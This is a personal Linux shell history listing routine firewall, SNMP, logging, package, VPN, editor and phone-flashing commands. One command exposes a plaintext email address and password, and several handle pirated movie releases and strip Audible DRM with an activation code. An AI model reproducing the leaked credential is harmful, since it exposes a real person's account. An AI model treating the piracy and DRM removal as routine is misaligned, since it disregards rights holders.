gsettings +gsettings list-schemas +modinfo cfg80211 +cat /etc/modprobe.d/cfg80211.conf +sudo iptables -L +less Documents/iprules/rules.v4 +sudo iptables -L|less +s +less rules.owt +sudo iptables -L -t mangle +sudo iptables L +sudo iptables -L -nv +sudo iptables -L -nv|less +iptables -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT +sudo iptables -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT +sudo iptables -L -nvx|less +sudo iptables -L -nv --line-number|less +sudo iptables -D 6 +sudo iptables -d 6 +sudo iptables -D FORWARD 6 +sudo iptables -A FORWARD -m conntrack -i wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT +sudo iptables -A FORWARD -m conntrack -i wlan0 -m state --ctstate RELATED,ESTABLISHED -j ACCEPT +sudo iptables -A FORWARD -i wlan0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT +sudo iptables -L -nv --line-number|less +sudo iptables -A FORWARD -j LOGDROP +sudo iptables -L -nv --line-number|less +sudo iptables -D FORWARD 4 +sudo iptables -L -nv --line-number|less +less rules.owt +sudo iptables -L -nv --line-number|less +sudo iptables -t mangle -L -nv --line-number|less +less rules.owt +sudo iptables -t mangle -L -nv --line-number|less +sudo iptables -t nat -L -nv --line-number|less +cat rules.owt +less rules.owt +cat rules.owt|sed 's/br\-lan/eth0/g' +sed -i 's/br\-lan/eth0/g' rules.owt +cat rules.owt|sed 's/eth0\.2/wlan0/g' +sed -i 's/eth0\.2/wlan0/g' rules.owt +less rules.owt +sudo iptables-restore < rules.owt +vim rules.owt +sudo iptables-restore < rules.owt +vim rules.owt +sudo iptables-restore < rules.owt +iptables -L +sudo iptables -L +less rules.owt +less rules.owt +ls -ltr +l +rm blah +sudo iptables-save > blah +vim blah +sudo su - +QLOG +qlog +mv Star\ Wars\ The\ Last\ Jedi\ \(2017\)\ \[BluRay\]\ \[720p\]\ \[YTS.AM\] /media/bjohnston/Acer/Users/bjohnston/Videos/ +mv Star\ Wars\ Episode\ VII\ -\ The\ Force\ Awakens\ \(2015\)\ \[YTS.AG\] /media/bjohnston/Acer/Users/bjohnston/Videos/ +ls /media/bjohnston/Acer/Users/ +ls /media/bjohnston/Acer/Users/bjohnston/Videos/|grep -i star +ls /media/bjohnston/Acer/Users/bjohnston/Videos/Star\ Wars\ Episode\ VII\ -\ The\ Force\ Awakens\ \(2015\)\ \[YTS.AG\]/ +rm -rf +rm -rf Star\ Wars\ Episode\ VII\ -\ The\ Force\ Awakens\ \(2015\)\ \[YTS.AG\]/ +mv Enemy\ of\ the\ State\ \(1998\) /media/bjohnston/Acer/Users/bjohnston/Videos/ +sudo vim /etc/sysctl.conf +pkill -1 kodi +;s +ls stuff/ +mv conky-rss.sh ../bin/ +less .kodi/userdata/RssFeeds.xml +man conky +less bin/conky-rss.sh +curl +curlss +curl +less bin/conky-rss.sh +curl +vim xml +less bin/conky-rss.sh +curl +vim xml +./bin/conky-rss.sh +pkill -1 conky +less bin/conky-rss.sh +pkill -1 conky +less bin/conky-rss.sh +vim bin/conky-rss.sh +./conky-rss.sh +vim .config/conky/conky.conf +pkill -1 conky +vim .config/conky/conky.conf +vim .config/conky/conky.conf +pkill -1 conky +vim .config/conky/conky.conf +pkill -1 conky +vim .config/conky/conky.conf +cat xml | sed -e 's/<\/title>/ +/g' +cat xml | sed -e 's/<\/title>/ +/g' | grep -o '.*' +cat xml | sed -e 's/<\/title>/ +/g' | grep -o '<title>.*' | sed -e 's/<title>//' |\ +cat xml | sed -e 's/<\/title>/ +/g' | grep -o '<title>.*' | sed -e 's/<title>//' +cat xml | sed -e 's/<\/title>/ +/g' | grep -o '<title>.*' | sed -e 's/<title>//' | grep -v nixCraft +cat xml | sed -e 's/<\/title>/ +/g' | grep -o '<title>.*' | sed -e 's/<title>//' +less xml +cat xml | sed -e 's/<\/title>/ +/g' | grep -o '<title>.*' | sed -e 's/<title>//' +cat xml | sed -e 's/<\/title>/ +/g' | grep -o '<title>.*' | sed -e 's/<title>//' | grep -v nixCraft +vim .config/conky/conky.conf +pkill -1 conky +vim .config/conky/conky.conf +pkill -1 conky +pkill -15 conky +nohup conky& +pkill -1 conky +pkill -15 conky +nohup conky& +l +rm xml +man conky +sudo ifup eth0 +log +klog +less .xsession-errors +ls /proc/ +cat /proc/loadavg +cat /proc/cpuinfo +ls /proc/ +cat /proc/stat +man -k load +cat /proc/stat +man -k stat +mocp +top 1 +man top +cat /proc/stat |grep cpu +grep 'cpu ' /proc/stat | awk '{usage=($2+$4)*100/($2+$4+$5)} END {print usage "%"}' +grep 'cpu' /proc/stat | awk '{usage=($2+$4)*100/($2+$4+$5)} END {print usage "%"}' +grep 'cpu' /proc/stat +grep 'cpu' /proc/stat | head - +grep 'cpu' /proc/stat | head -1 +grep 'cpu' /proc/stat | head -1| awk '{usage=($2+$4)*100/($2+$4+$5)} END {print usage "%"}' +man stat +man conky +vim cpu.sh +chmod cpu.sh +chmod +x cpu.sh +./cpu.sh +mpstat +mpstat --help +man mpstat +mpstat | awk '$12 ~ /[0-9.]+/ { print 100 - $12"%" }' +mpstat | awk '$12 ~ /[0-9.]+/ { print 100 - $11"%" }' +mpstat | awk '$3 ~ /CPU/ { for(i=1;i<=NF;i++) { if ($i ~ /%idle/) field=i } } $3 ~ /all/ { print 100 - $field }' +vim .config/conky/conky.conf +pkill -1 conky +less .xsession-errors +vim .config/conky/conky.conf +sudo ifdown eth0 +sudo ifup eth0 +snmp +snmpwalk +less /etc/snmp/snmp.conf +sudo vim /etc/snmp/snmp.conf +man snmp.conf +man snmp +man snmpd +man snmpd.conf +sudo vim /etc/snmp/snmpd.conf +sudo /etc/init.d/snmpd restart +snmpwalk --help +snmpwalk -c lctro +snmpwalk -c lctro localhost +vim /etc/snmp/snmp.conf +sudo vim /etc/snmp/snmp.conf +sudo /etc/init.d/snmpd restart +snmpwalk -c lctro +snmpwalk -c lctro localhostsnmpwalk -Os -c public -v 1 zeus system +sudo vim /etc/snmp/snmpd.conf +snmpwalk -c lctro localhost +man snmpwalk +snmpwalk -Os -c lctro -v 1 localhost system +sudo vim /etc/snmp/snmpd.conf +sudo /etc/init.d/snmpd restart +sudo vim /etc/snmp/snmpd.conf +snmpwalk -Os -c lctro -v 1 localhost system +sudo vim /etc/snmp/snmpd.conf +snmpwalk -Os -c lctro -v 1 localhost system +sudo /etc/init.d/snmpd restart +snmpwalk -Os -c lctro -v 1 localhost system +snmpwalk -Os -c lctro -v 1 localhost +snmpwalk -Os -c lctro -v 1 localhost |less +vim /etc/networks +route +snmpwalk -Os -c lctro -v 1 localhost |less +sudo ifdown eth0 +sudo ifup eth0 +sudo vim /etc/iptables/rules.v4 +sudo iptables-restore < /etc/iptables/rules.v4 +iptables -L -nv +sudo iptables -L -nv +sudo iptables -L -nv|less +less Documents/iprules/rules.owt +sudo vim /etc/iptables/rules.v4 +qls +ssh router +scp router:/root/openwrt.owt . +ssh router +less openwrt.owt +sudo vim /etc/iptables/rules.v4 +less openwrt.owt +sudo systemctl restart avahi-daemon.service +sudo netstat -ntulp +sudo netstat -ntulp|grep 1567 +sudo vim /etc/iptables/rules.v4 +sudo iptables-restore < /etc/iptables/rules.v4 +sudo vim /etc/iptables/rules.v4 +sudo iptables-restore < /etc/iptables/rules.v4 +sudo vim /etc/iptables/rules.v4 +sudo iptables-restore < /etc/iptables/rules.v4 +iptables -L +sudo iptables -L +sudo iptables -L -nv +sudo vim /etc/iptables/rules.v4 +sudo iptables-restore < /etc/iptables/rules.v4 +sudo iptables -L -nv +sudo vim /etc/iptables/rules.v4 +sudo iptables-restore < /etc/iptables/rules.v4 +sudo iptables -L -nv +sudo iptables -t nat -L -nv +sudo iptables -t mangle -L -nv +mv Call\ Me\ By\ Your\ Name\ 2017\ DVDSCR\ X264\ CataVentos\[EtMovies\]/ +mv Ca +mv Call\ Me\ By\ Your\ Name\ 2017\ DVDSCR\ X264\ CataVentos\[EtMovies\]/ +mv Call Me By Your Name 2017 DVDSCR X264 CataVentos[EtMovies] .. +ls|grep -i cataventos +mv "Call Me By Your Name 2017 DVDSCR X264 CataVentos[EtMovies]" .. +mv 'Call Me By Your Name 2017 DVDSCR X264 CataVentos[EtMovies]' .. +nslookup clock.windows.com localhost +s +rm kodi_crashlog-20180311_003735.log +lll +rm -rf Transformers\ Age\ of\ Extinction\ \(2014\)/ +mv ~/Videos/Movies/Transformers\ Age\ of\ Extinction\ \(2014\)/ . +ls ~/Videos/Movies/ +rm -rf ~/Videos/Movies/Hardcore\ Henry\ \(2015\)\ \[YTS.AG\]/ +rm -rf ~/Videos/Movies/Gamer\ \(2009\)/ +ls ~/Videos/Movies/ +df -h +mv ~/Videos/Movies/The\ Hobbit\ An\ Unexpected\ Journey\ \(2012\)/ . +sudo ifdown eth0 +sudo ifup eth0 +vim .bashrc +. .bashrc +vim .bashrc +snmpwalk -Os -c lctro -v 1 localhost |less +man snmpwalk +snmpwalk -Os -c lctro -v 1 localhost . +snmpwalk -Os -c lctro -v 1 localhost +snmpwalk -Os -c lctro -v 1 localhost . +snmpwalk -Os -c lctro -v 1 localhost . +snmpwalk -Os -c lctro -v 1 localhost . +snmpwalk -Os -c lctro -v 1 localhost . +snmpwalk -Os -c lctro -v 1 localhost . +man snmwalk +man snmpwalk +snmpwalk -Os -c lctro -v 1 localhost -Ci . +snmpwalk -Os -c lctro -v2c localhost -Ci . +snmpwalk -Os -c lctro -v2c localhost|less +i +ip +i[ addr +ip addr +man ip +man ip-address +ip addr show dev eth0 +cat /etc/snmp/snmp.conf +cat /etc/snmp/snmpd.conf +snmpwalk -Os -c lctro -v2c localhost|less +snmpwalk -Os -c lctro -v2c localhost . +snmpwalk -Os -c lctro -v2c localhost . +snmpwalk -c lctro -v2c localhost . +snmpwalk -c lctro -v2c localhost . +man snmpwalk +man 5 variables +man snmpcmd +snmpwalk -Of -c lctro -v3 localhost . +man snmpcmd +snmpwalk -Of -c lctro -v3 localhost +snmpwalk -Os -Of -c lctro -v3 localhost +snmpwalk -Os -Of -c lctro -v2 localhost +man snmpwalk +sudo vim /etc/snmp/snmpd.conf +snmpwalk -Os -Of -c lctro -v2 localhost +snmpwalk -Os -Of -c lctro -v2c localhost +snmpwalk -Os -Of -c lctro -v2c localhost +snmpwalk -Os -Of -c lctro -v2c localhost +snmpwalk -Os -Of -c lctro -v2c localhost +snmpwalk -Os -Of -c lctro -v2c localhost|less +snmpwalk -Os -Of -c lctro -v2c localhost|less +snmpwalk -Os -Of -c lctro -v2c localhost|less +snmpwalk -Os -Of -c lctro -v2c localhost|less +snmpwalk -Os -Of -c lctro -v2c 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-Os -Of -c lctro -v2c localhost . +snmpwalk -Os -Of -c lctro -v2c localhost |less +pkill -QUIT evolution +ps aux|less +sudo systemctl stop slapd +sudo systemctl disable slapd +ps aux|less +sduo su - +vim /etc/rsyslog.conf +sudo vim /etc/rsyslog.conf +sudo systemctl restart rsyslog +sudo vim /etc/rsyslog.conf +ls /etc/rsyslog.d +ls /usr/share/rsyslog/ +ls /usr/lib/rsyslog/ +sudo vim /etc/rsyslog.conf +sudo vim /etc/rsyslog.d/50-default.conf +sudo systemctl restart rsyslog +sudo vim /etc/rsyslog.conf +sudo vim /etc/rsyslog.d/50-default.conf +ls /etc/rsyslog.d/ +sudo rm /etc/rsyslog.d/50-default.conf~ +~~ +sudo vim /etc/rsyslog.d/50-default.conf +sudo systemctl restart rsyslog +l. /etc/rsyslog.d/ +rm /etc/rsyslog.d/50-default.conf~ +sudo rm /etc/rsyslog.d/50-default.conf~ +sudo rm /etc/rsyslog.d/.50-default.conf~ +sudo rm /etc/rsyslog.d/.50-default.conf.un~ +l. /etc/rsyslog.d/ +sudo systemctl restart rsyslog +ls /dev|grep tty +sudo vim /etc/rsyslog.d/50-default.conf +id rsyslog +ps aux|grep syslo +sudo vim /etc/group +sudo systemctl restart rsyslog +sudo iptables -L -nv +sudo iptables-restore < /etc/iptables/rules.v4 +sudo sysctl -p +pkill -1 kodi +vim .bashrc +./UniqueValuesInString hey +./UniqueValuesInString heya +./UniqueValuesInString heya3 +./UniqueValuesInString heya33 +./UniqueValuesInString ahoy +./UniqueValuesInString ahoya +./UniqueValuesInString ahoyA +./UniqueValuesInString ahoyAA +/usr/bin/env +/usr/bin/env +trizen -Syyu +ls +trizen -Syyu --noconfirm +vim PivotIndex.cpp +g++ PivotIndex.cpp -o PivotIndex +./PivotIndex +vim PivotIndex.cpp +g++ PivotIndex.cpp -o PivotIndex +./PivotIndex +vim PivotIndex.cpp +g++ PivotIndex.cpp -o PivotIndex +./PivotIndex +vim PivotIndex.cpp +g++ PivotIndex.cpp -o PivotIndex +vim PivotIndex.cpp +g++ PivotIndex.cpp -o PivotIndex +vim PivotIndex.cpp +g++ PivotIndex.cpp -o PivotIndex +vim PivotIndex.cpp +g++ PivotIndex.cpp -o PivotIndex +g++ PivotIndex.cpp -o PivotIndex +./PivotIndex +vim .viminfo +vim ~/.vimrc +sudo vim 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pacman -S rust-docs rust-racer +exit +vim .vimrc +vim .vimrc +vim +PlugInstall +qall +trizen -Ss neobundle +trizen -Ss vim-plug +trizen -S vim-plug +vim +PlugInstall +qall +vim .vimrc +vim +PlugInstall +qall +vim .vimrc +exit +vim +PlugInstall +qall +vim .vimrc +vim .vimrc +ls +mkdir plugged +vim .vimrc +cls +vim .vimrc +ls +ls +ls rust.vim/ +ls +ls +ls +ls +ls +ls +mkdir Rust +ls +vim test +rustup +trizen -Ss rustfmt +trizen -S rustup +vim hello.rs +cat hello.rs +rustc hello.rs +trizen -Syyu +pgp --recv-keys +gpg --reck-keys +gpg --recv-keys +sudo dirmngr </dev/null +dirmngr </dev/null +exit +sudo pacman-key --refresh-keys +trizen -Ss acpi-light +trizen -Ss acpilight +trizen -S acpiligt +trizen -Syyu +trizen -S acpilight +pacman -Cc +pacman -c +pacman -C +trizen -ss llvm +trizen -Ss llvm +sudo pacman -S clang llvm-libs lib32-llvl-libw +sudo pacman -S clang llvm-libs lib32-llvl-libs +sudo pacman -S clang llvm-libs lib32-llvm-libs +rustc hello.rs +ls +./hello +cat hello.rs +vim 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+python2 +pip2 +pip2 uninstall --user selenium +pip2 uninstall selenium +trizen -Ss pip2arch +trizen -Ss pip2 +trizen -Ss python2-pip2pkgbuild --noconfirm +trizen -S python2-pip2pkgbuild --noconfirm +pip2pkgbuild2 +pip2pkgbuild2 selenium +ls +vim PKGBUILD +pacman -U +makepkg PKGBUILD +ls +sudo pacman -U selenium-3.141.0.tar.gz +sudo pacman -U python2-selenium-3.141.0-1-any.pkg.tar.lzo +rm -rf pkg +rm -rf src +ls +rm -rf selenium-3.141.0.tar.gz +python2-selenium +exit +trizen -S audible-activator-git --noconfirm +trizen -Syy +trizen -S audible-activator-git +trizen -Ss chrome +trizen -S audible-activator-git +audible-activator +trizen -S chromedriver +audible-activator +trizen -Ss chrome +trizen -R chromedriver +trizen -R chromedriver-beta +trizen -S chromedriver-beta +trizen -S chromedriver --noconfirm +trizen -S google-chrome +cat .config/chrome-flags.conf +audible-activator +audible-activator +audible-activator +audible-activator -h +audible-activator -d --username=gokussjx@gmail.com --password=santi69 +trizen -R pip2-tools +trizen -R python2-pip2pkgbuild +audible-activator +trizen -Ss aax +aaxtomp3 +AAXtoMP3 +ls +AAXtoMP3 --aac -e:m4a -e:m4b -c -A be078508 B017V4IWVG_ep5.aax +ls +AAXtoMP3 --aac -e:m4a -e:m4b -c be078508 B017V4IWVG_ep5.aax +AAXtoMP3 --aac -e:m4a -e:m4b -c -A be078508 B017V4IWVG_ep5.aax +ls +ls -salt +AAXtoMP3 --aac -e:m4a -e:m4b -c -A be078508 B017V4IWVG_ep5.aax +AAXtoMP3 --aac be078508 B017V4IWVG_ep5.aax +ls +AAXtoMP3 +trizen -Ss aax +trizen -R aaxtomp3 +trizen -S aaxtomp3-git --noconfirm +AAXtoMP3 +AAXtoMP3 --aac -e:m4a -e:m4b -c -A be078508 B017V4IWVG_ep5.aax +AAXtoMP3 --aac -e:m4a -e:m4b -c -A be078508 B017V4NMX4_ep5.aax +AAXtoMP3 --aac -e:m4a -e:m4b -c -A be078508 B01KI8EHN4_ep5.aax +AAXtoMP3 --aac -e:m4a -e:m4b -c -A be078508 B06X9MXN32_ep5.aax +AAXtoMP3 --aac -e:m4a -e:m4b -c -A be078508 B07FN7BRNL_ep5.aax +trizen -Syyua +trizen -Syyua --noconfirm +exit +exit +exit +exit +htop +exit +ls +ls +ls LFS +ls +ls +ls +vim UndefinedBehav.cpp +g++ UndefinedBehav.cpp -o UndefinedBehav +./UndefinedBehav +vim UndefinedBehav.cpp +g++ UndefinedBehav.cpp -o UndefinedBehav +./UndefinedBehav +vim UndefinedBehav.cpp +g++ UndefinedBehav.cpp -o UndefinedBehav +./UndefinedBehav +vim UndefinedBehav.cpp +g++ UndefinedBehav.cpp -o UndefinedBehav +vim UndefinedBehav.cpp +g++ UndefinedBehav.cpp -o UndefinedBehav +./UndefinedBehav +exit +trizen -Syy +cat /etc/pacman.d/hooks/mirrorupgrade.hook +systemctl status reflector +sudo reflector --country 'United States' --age 12 --protocol https --sort rate --save /etc/pacman.d/mirrorlist +sudo reflector --country 'United States' --age 24 --protocol https --sort rate --save /etc/pacman.d/mirrorlist +trizen -Ss expressvpn +trizen -Ss express +trizen -Ss vpn +trizen -S expressvpn +gpg --recv-keys AFF2A1415F6A3A38 +trizen -S expressvpn +trizen -S expressvpn --noconfirm +expressvpn activate +sudo systemctl status expressvpn +sudo systemctl start expressvpn +sudo systemctl status expressvpn +expressvpn activate +sudo systemctl status expressvpn +expressvpn +expressvpn preferences +expressvpn ls +expressvpn connect usny +expressvpn status +expressvpn install-chrome-extension +expressvpn status +expressvpn disconnect +trizen -Ss expressvpn +expressvpn connect usny +expressvpn status +expressvpn status +expressvpn status +expressvpn status +expressvpn status +expressvpn status +sudo systemctl restart networkmanager +sudo systemctl restart NetworkManager +exit +expressvpn status +sudo systemctl restart NetworkManager +exit +expressvpn status +sudo systemctl restart NetworkManager +exit +sudo systemctl restart NetworkManager +exit +sudo systemctl restart NetworkManager +exit +expressvpn disconnect +sudo systemctl restart NetworkManager +exit +trizen -Syyu +trizen -Sdd libvpx x264 +sudo pacman -Sdd libvpx x264 +trizen -Syyu --noconfirm +trizen -Syyu --noconfirm +trizen -Syy +trizen -Ss fzf +trizen -Ss ff +trizen -Ss "ff" +trizen -Ss ff +trizen -S fzf fzf-extras vim-fzf-git +trizen -Ss find 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.bash_profile +vg trait +vg trait rs +vg traitrs +find . -type f | fzy +find . -type f | fzf +rg -i hello +rg -i hello | fzr +rg -i hello | fzy +rg -i hello | fzy +find . -type f | fzy +trizen -Ss spacemacs +trizen -Ss emacs +trizen -Ss typora +trizen -S typora emacs --noconfirm +trizen -S typora emacs --noconfirm +trizen -S typora emacs --noconfirm +exit +trizen -Syyu +sudo pacman -Scc +archey3 +exit +archey3 +exit +exit +trizen -Syy +trizen -Ss darktable +sudo pacman -S darktable +trizen -Ss olympus +exit +exit +trizen -Ss photopc +exit +trizen -Ss digikam +trizen -S digikam +exit +lsdev +ls /dev/ +lsblk +lspci +trizen -Ss udisk +udisksctl +udisksctl info +udisksctl dump +lspci +lsmod | egrep 'mmc|ricoh|sdhci' +lsusb +exit +ls /dev/mmc* +ls /dev/mem +dmesg +echo 1 > /sys/bus/pci/rescan +sudo echo 1 > /sys/bus/pci/rescan +su +dmesg +dmesg +dmesg +sudo rmmod rtsx_pci_sdmmc +sudo rmmod mmc_core +sudo rmmod rtsx_pci +sudo rmmod rtsx_pci_ms +sudo rmmod rtsx_pci +sudo modprobe rtsx_pci_sdmmc +sudo modprobe mmc_core +sudo modprobe rtsx_pci +sudo modprobe rtsx_pci_ms +lsmod | egrep 'mmc|ricoh|sdhci' +dmesg +dmesg +mount -t vfat /dev/mmcblk0 /tmp +sudo mount -t vfat /dev/mmcblk0 /tmp +exit +exit +exit +trizen -Ss exfat +trizen -S sdfat-dkms +exfatfsck +exfatfsck -l +exfatfsck -V +exfatfsck -a +exfatfsck --help +man exfatfsck +lsmod fat +lsmod | grep fat +lsmod | grep ex +trizen -S exfat-dkms-git +exfatfsck +uname -ar +ls /boot +ls +ls EFI +ls grub +vim grub/grub.cfg +vim EFI/grub/grubx64.efi +ls +mkdir -p ~/boot_backup +sudo mv *9560* ~/boot_backup/ +ls +vim vmlinuz-linux +vim initramfs-linux.img +vim FSCK0000.REC +sudo grub-mkconfig -o /boot/grub/grub.cfg +trizen -Syyu +trizen -Syyu --noconfirm +trizen -Ss talloc +trizen -Syyu --noconfirm +sudo pacman -S talloc +trizen -S lib32-talloc lib32-tevevnt +trizen -Ss ldb +trizen -S lib32-tevent --noconfirm +trizen -R ldb +trizen -R lib32-ldb +trizen -R lib32-smbclient +trizen -R lib32-ldb +trizen -R lib32-talloc lib32-tevevent +trizen -R lib32-talloc lib32-tevent +exiy +exit +trizen -Syyu --noconfirm +trizen -Ss acestream +trizen -R acestream-player acestream-player-data acestream-engine +exit +trizen -Syyu --noconfirm +trizen -R lib32-smblient +trizen -R lib32-smbclient +sudo pacman -R linux-xps-9560 +sudo pacman -R linux-xps-9560-headers +trizen -Syyu --noconfirm +expressvpn +expressvpn connect +systemctl start expressvpnd +sudo systemctl start expressvpnd +sudo systemctl start expressvpn +sudo systemctl status expressvpn +expressvpn connect +sudo expressvpn connect +sudo expressvpn connect +sudo expressvpn list +sudo expressvpn connect smart +sudo expressvpn refresh +sudo expressvpn diagnostics +ping google.com +exit +sudo expressvpn connect +sudo systemctl restart expressvpn +sudo expressvpn status +sudo expressvpn connect usny +sudo expressvpn connect usny +sudo expressvpn connect uswd +sudo expressvpn install-chrome-extension +sudo expressvpn install-firefox-extension +sudo expressvpn install-firefox-extension +sudo expressvpn activate +sudo systemctl restart NetworkManager +trizen -Syyu --noconfirm +sudo expressvpn connect +trizen -Syyu --noconfirm +popcorntime-ce +trizen -Ss shashlik +trizen -Ss archon +trizen -S shashlik-bin +c +z downloads +f +fzf Downloads +fzf +j +ls +ls +ls +shashlik-install Amazon\ Kindle_v8.20.0.10_apkpure.com.apk +shashlik-install com.amazon.kindle_8.20.0.10-1213202442.apk +trizen -Ss archon +trizen -S archon-exec +exit +exit +trizen -Syyu --noconfirm +sudo systemctl restart NetworkManager +exit +trizen -Ss telegram +sudo pacman -S telegram-desktop +telegram-desktop +emacs +vim .bashrc +trizen -Ss kwrite +/usr/bin/env +man z +z +z +trizen -Ss 'z' +vim .bash_profile +ls +ls +git clone +ls +ls +git pull +ls /usr/local/man/ +echo $MANPATH +cat /etc/bash.bashrc +/man +cat /etc/bash.bashrc +vim $! +cat /etc/bash.bashrc +vim /etc/bash.bashrc +ls +rm -rf z +trizen -Ss z-git +trizen -S z-git +vim .bash_profile +source .bash_profile +z +zz +ls +ls +ls +ls +ls +ls +z Leet +ls +ls -salt +z +echo $_Z_DATA +echo $_Z_CMD +ls +vim .z +touch .z +ls +ls -salt +ls +z Program +z +exit +man z +exit +z +exit +z +source .bash_profile +z +ls +cat .z +ls +cat .z +ls /usr/share/man/ +export _Z_DATA=$HOME/.z +echo $_Z_DATA +ls +z +fg +fz +fzf +fe cpp +exit +man z +exit +clear +lsusb +lsblk +lsusb +/usr/bin/env +trizen -Syys exfat +clear +trizen -Ss exfat +exfatfsck +exfatfsck -V +exfatfsck -a +exfatfsck -n +fastboot +fastboot reboot +fastboot devices +fastboot devices +fastboot devices +fastboot devices +fastboot devices +fastboot devices +ls +fastboot boot twrp-3.3.1-0-marlin.img +adb sideload twrp-pixel-installer-marlin-3.3.0-0.zip +adb devices +fastboot boot twrp-3.3.1-0-marlin.img +fastboot boot twrp-3.3.1-0-marlin.img +fastboot boot twrp-3.3.1-0-marlin.img +fastboot boot twrp-3.3.1-0-marlin.img +fastboot boot twrp-3.3.1-0-marlin.img +exit +fastboot flash bootloader bootloader-marlin-8996-012001-1904111134.imgsss +fastboot flash bootloader bootloader-marlin-8996-012001-1904111134.img +fastboot reboot-bootloader +fastboot flash radio radio-marlin-8996-130281-1903110834.img +fastboot reboot-bootloader +fastboot -w update image-marlin-pq3a.190801.002.zip +systemctl status vmware-hostd.service +systemctl start vmware-hostd.service +systemctl status vmware-hostd.service +systemctl kill vmware-hostd.service +sudo modprobe vmmon +trizen -Ss vmware +trizen -S vmware-workstation12 +trizen -S vmware-keymaps --overwrite usr/lib/vmware/xkeymap/\* --noconfirm +trizen -S vmware-keymaps --overwrite /usr/lib/vmware/xkeymap/\* --noconfirm +trizen -R vmware-workstation +trizen -S vmware-workstation12 +trizen -S vmware-workstation12 --noconfirm +trizen -S vmware-workstation12 --noconfirm --force +sudo modprobe vmw_vmci +sudo modprobe -a vmw_vmci vmmon +sudo systemctl start vmware-networks.service +sudo systemctl start vmware-usbarbitrator.service +sudo systemctl start vmware-hostd.service +exit +source ~/.bashrc +vim launch_vmware.sh +chmod +x launch_vmware.sh +./launch_vmware.sh +exit +sudo pacman -Scc +exit +ls +ls +exit +exit +./launch_vmware.sh +cat launch_vmware.sh +sudod rmmod -a vmw_vmci vmmon +sudo rmmod -a vmw_vmci vmmon +sudo rmmod -vmw_vmci vmmon +sudo rmmod vmw_vmci vmmon +sudo kill -9 vmware +ps -aux | grep vmware +ps -aux | grep vmware +sudo kill -9 vmware +sudo rmmod vmw_vmci vmmon +sudo rmmod vmw_vmci vmmon --force +cat launch_vmware.sh +sudo systemctl kill vmware* +sudo systemctl kill vmware-networks.service +sudo systemctl kill vmware-usbarbitrator.service +sudo systemctl kill vmware-hostd.service +./launch_vmware.sh +exit +emacs +emacs +emacs +vim .emacs +emacs +emacs +emacs +emacs +emacs +emacs +emacs +emacs +emacs +emacs +emacs +emacs +emacs +emacs +emacs +git clone +sudo ./install.sh +exit +emacs +emacs +emacs +emacs +emacs +emacs +cat .fonts +cat .fonts.conf +vim .fonts.conf +exit +vim .emacs +emacs +emcs +emacs --version +exit +emacs +vim .emacs +emacs +emacs +vim .emacs +emacs +emacs +emacs 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status +sudo expressvpn status +sudo expressvpn status +sudo expressvpn status +sudo expressvpn status +sudo expressvpn status +vim .vimrc +vim +vim /etc/vimrc +vim .vimrc +exit +sudo expressvpn status +sudo expressvpn status +trizen -Syy +trizen -Ss doom +exit +ls +git clonessner/doom-emacs.git +git clone -b developssner/doom-emacs ~/.emacs.d +mv .emacs.d .emacs.d.bak +git clone -b developssner/doom-emacs ~/.emacs.d +ls .. +ls -salt .. +ls +bin/doom quickstart +vim core/core-packages.el +bin/doom quickstart +pings/ +pings +ping elpa.gnu.org/packages +vim core/core-packages.el +trizen -Ss emacs +vim core/core-packages.el +bin/doom quickstart +rm -rf .emacs.d +git clone -b developssner/doom-emacs ~/.emacs.d +ls +vim core/*pac* +vim core/*pac* +bin/doom quickstart +ls +ls +ls +bin/doom refresh +vim init.el +vim config.el +vim packages.el +bin/doom refresh +vim config.el +vim config.el +vim config.el +vim ~/.vimrc +vim ~/.vimrc +vim config.el +vim packages.el +bin/doom refresh +ls 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ZNuked_Emacs_Doom_Backup/_emacs.d +git status +git rm ZNuked_Emacs_Doom_Backup/_emacs.d +git rm ZNuked_Emacs_Doom_Backup/_emacs.d -f +git status +git add . +git status +git add . +git status +git commit -m "Fix doom backup" +git push +sudo expressvpn status +sudo expressvpn disconnect +sudo expressvpn status +fg line-number +trizen -Syyu +trizen -S python-tensorflow +trizen -S tensorflow +trizen -S tensorflow --force +trizen -S tensorflow --overwrite +man trizen +trizen -S tensorflow --overwrite +trizen -S tensorflow +trizen -S tensorflow --force +trizen -Syyu --noconfirm +bin/doom upgrade +git status +git diff +git add . +git commit -m "TLS1.3" +git pull +man pacman +bin/doom upgrade +z doom +z +source .bash_profile +z +z doom +ls +bin/doom refresh +bin/doom refresh +bin/doom update +exit +tmux +tmux ls +echo "Hi, Bidyut!" +exit +tmux attach -t 0 +tmux ls +echo "Hi, Bidyut!" +tmux +tmux detach +tmux ls +tmux attach -t 0 +exit +tmux attach -t 0 +ls +exit +bin/doom refresh +trizen -Ss zah +trizen -Ss zsh +sudo pacman -S zsh +Current Perl version using plenv +exit +trizen -S zsh-autosuggestions zsh-completions zsh-history-substring-search zsh-lovers zsh-syntax-highlighting bullet-train-oh-my-zsh-theme-git +zsh +zshrc +ls /usr/share/oh-my-zsh/plugins/syn* +ls /usr/share/oh-my-zsh/plugins/ +vim /usr/share/zsh/plugins/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh +ls /usr/share/oh-my-zsh/custom/plugins/ +ls /usr/share/oh-my-zsh/custom/plugins/example/example.plugin.zsh +vim /usr/share/oh-my-zsh/custom/plugins/example/example.plugin.zsh +sudo cp /usr/share/zsh/plugins/* /usr/share/oh-my-zsh/custom/plugins/ +sudo cp /usr/share/zsh/plugins/* /usr/share/oh-my-zsh/custom/plugins/ -rf +ls /usr/share/oh-my-zsh/custom/plugins/ +zsh +ls +exit +bin/doom refresh +$ZSH +ls +zsh +exit +zsh +exit +zsh +exit +exit +zsh +exit +exit +ls +ls +vim .bashrc +ls +zsh +exit +zsh +zsh +ls +clea +clear +ls +ls -salt +vim +vim .zshrc +zsh +exit +vim .fonts.conf +vim .fonts/fonts.dir +ls .fonts/fonts.dir +ls +ls +exit +zsh +exit +zsh +zshrc +zshr +ls +iasdfas +ls -salt +ls +ls -a +ls -hF +man ls +ls -A +ls -a +man ls +tree -Cs +LESS +less +echo test | LESS +echo test | LESSOPEN +source .bashrc +echo test | LESS +echo test | LESSOPEN +echo test LESSOPEN +cat .doom.d LESSOPEN +zsh +zsh +ls -hFA +ls -hF +vim .zshrc +vim .zpr +bindkey | grep fzf +zsh +exit +zsh +exit +zsh +exit +zsh +exit +vim .zprofile +vim .zshrc +vim .zprofile +vim .zprofile +vim .zshrc +chsh 